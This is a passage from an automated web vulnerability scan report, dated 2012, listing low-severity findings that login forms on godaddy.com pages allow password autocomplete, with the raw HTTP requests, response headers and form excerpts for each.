<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.23. http://www.godaddy.com/domains/domain-broker.aspx/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/domain-broker.aspx/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/domain-broker.aspx/?isc=smtwfos HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=mnkoewti1e4x2hpxuhxwsmv5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=mnkoewti1e4x2hpxuhxwsmv5; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:47 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:47 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:47 GMT; path=/
Set-Cookie: SplitValue1=53; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:47 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/domain-broker.aspx/&server=M1PWCORPWEB137&status=200 OK&querystring=isc=smtwfos&shopper=&privatelabelid=1&isc=smtwfos&clientip=174.36.218.2&referringpath=&referringdomain=&split=53; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:47 GMT
Connection: close
Content-Length: 94540


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=smtwfos&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.24. http://www.godaddy.com/domains/domain-transfer.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/domain-transfer.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/domain-transfer.aspx?isc=GPPT03C018&domain=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=qb2ya5rtfv2hnbvufwt1nmni; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=qb2ya5rtfv2hnbvufwt1nmni; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:18 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:18 GMT; path=/
Set-Cookie: SplitValue1=20; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/domain-transfer.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=GPPT03C018&domain=edhardy.com&shopper=&privatelabelid=1&isc=GPPT03C018&clientip=174.36.218.2&referringpath=&referringdomain=edhardy.com&split=20; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=bgvggfufthnbzfqdvgvfcfsakjnceitg; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:40:18 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=bgvggfufthnbzfqdvgvfcfsakjnceitg; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:18 GMT
Connection: close
Content-Length: 167651


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=GPPT03C018&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.25. http://www.godaddy.com/domains/domain-transfer.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/domain-transfer.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/domain-transfer.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=mweiviwhknw5sfidae0bx2jd; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=mweiviwhknw5sfidae0bx2jd; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:16 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:16 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:16 GMT; path=/
Set-Cookie: SplitValue1=87; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:16 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/domain-transfer.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=87; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=ncedoibgaelhqihghdaeygihbegcujfi; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:40:16 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=ncedoibgaelhqihghdaeygihbegcujfi; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:16 GMT
Connection: close
Content-Length: 164185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.26. http://www.godaddy.com/domains/domain_offer.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/domain_offer.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/domain_offer.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=t13p2jid5l11apxxupclb1gk; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=t13p2jid5l11apxxupclb1gk; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:45 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:45 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:45 GMT; path=/
Set-Cookie: SplitValue1=86; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:45 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/domain_offer.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=86; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:45 GMT
Connection: close
Content-Length: 108037


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.27. http://www.godaddy.com/domains/search.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=gxkfpkufpi23j0awqaogg02h; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=gxkfpkufpi23j0awqaogg02h; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:11 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:11 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:11 GMT; path=/
Set-Cookie: SplitValue1=8; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:12 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=8; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=sdhcigdgxasgtdfitjjgfcdjfjyirgyh; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:40:12 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=sdhcigdgxasgtdfitjjgfcdjfjyirgyh; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:11 GMT
Connection: close
Content-Length: 183160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.28. http://www.godaddy.com/domains/search.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/search.aspx?isc=gppt02C006&domain=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=aog1q1q4m5tiyufmwgpg4ygm; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=aog1q1q4m5tiyufmwgpg4ygm; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:12 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:12 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:12 GMT; path=/
Set-Cookie: SplitValue1=30; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:12 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=gppt02C006&domain=edhardy.com&shopper=&privatelabelid=1&isc=gppt02C006&clientip=174.36.218.2&referringpath=&referringdomain=edhardy.com&split=30; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=yeufiiqdgbqjdjpghamhcjqedighicse; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:40:12 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=yeufiiqdgbqjdjpghamhcjqedighicse; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:11 GMT
Connection: close
Content-Length: 186734


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=gppt02C006&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.29. http://www.godaddy.com/domains/search.aspx/u0027  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/search.aspx/u0027

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/search.aspx/u0027 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=yg2mogw5b2u0gdpe5pfren4a; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=yg2mogw5b2u0gdpe5pfren4a; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:30 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:30 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:30 GMT; path=/
Set-Cookie: SplitValue1=62; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:30 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx/u0027&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=62; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=tiijujaegjeeeetbsgeilbxdwjzanffh; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:40:30 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=tiijujaegjeeeetbsgeilbxdwjzanffh; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:29 GMT
Connection: close
Content-Length: 183168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.30. http://www.godaddy.com/domains/searchbulk.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/searchbulk.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/searchbulk.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=wwho5zzrplvm132ghdd13zck; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=wwho5zzrplvm132ghdd13zck; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:21 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:21 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:21 GMT; path=/
Set-Cookie: SplitValue1=67; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:21 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/searchbulk.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=67; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=egpigeudqildcasibhngnemaycrcuexa; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:40:21 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=egpigeudqildcasibhngnemaycrcuexa; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:20 GMT
Connection: close
Content-Length: 182954


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.31. http://www.godaddy.com/domains/searchbulk.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/searchbulk.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/searchbulk.aspx?isc=GPPT03C019&domain=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2yemsm35mfwwusdfcrdh5xwv; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=2yemsm35mfwwusdfcrdh5xwv; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:22 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:22 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:22 GMT; path=/
Set-Cookie: SplitValue1=43; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:22 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/searchbulk.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=GPPT03C019&domain=edhardy.com&shopper=&privatelabelid=1&isc=GPPT03C019&clientip=174.36.218.2&referringpath=&referringdomain=edhardy.com&split=43; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=tffgveijuacjzfmfmfdgpeifbjcfsbri; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:40:22 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=tffgveijuacjzfmfmfdgpeifbjcfsbri; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:21 GMT
Connection: close
Content-Length: 186465


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=GPPT03C019&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.32. http://www.godaddy.com/domains/searchidn.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/searchidn.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/searchidn.aspx?ci=53965&domainToCheck= HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=il5zq0qd3haa5mj50zqeou0c; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=il5zq0qd3haa5mj50zqeou0c; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:23 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:23 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:23 GMT; path=/
Set-Cookie: SplitValue1=16; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:23 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/searchidn.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=53965&domainToCheck=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=16; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:22 GMT
Connection: close
Content-Length: 118674


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.33. http://www.godaddy.com/domains/searchresults.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/searchresults.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/searchresults.aspx?ci=44919 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.godaddy.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; HPBackground=Danica2; pagecount=2; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; traffic=; adc1=US; currency1=potableSourceStr=USD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:32:08 GMT; path=/
